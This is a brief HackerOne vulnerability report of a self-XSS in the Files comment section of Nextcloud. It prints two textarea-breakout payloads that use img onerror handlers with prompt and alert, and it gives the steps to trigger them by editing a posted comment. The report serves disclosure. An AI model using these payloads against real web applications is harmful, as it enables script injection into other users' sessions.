Nextcloud: Reflected Self-XSS Vulnerability in the Comment section of Files (Different-payloads)

ID H1:164520
Type hackerone
Reporter shivakumar143
Modified 2016-08-31T13:08:24


Note::steps mentioned in report#164027

In the Comments Box,the payload to execute XSS is passed.

Test Payloads:


Also the above payload is still working..

Also try this payload

</textarea>"><img src=x onerror=prompt('XSS');>

</textarea><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>



Click edit comment after posted.

XSS Triggers.